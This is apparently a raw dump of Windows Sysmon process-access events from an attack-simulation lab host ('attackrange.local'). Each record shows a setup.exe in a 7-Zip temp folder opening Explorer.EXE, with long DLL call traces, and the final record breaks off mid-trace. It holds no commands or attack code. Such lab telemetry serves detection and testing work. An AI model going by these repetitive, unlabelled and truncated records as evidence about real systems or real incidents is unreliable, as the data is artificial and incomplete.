13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\w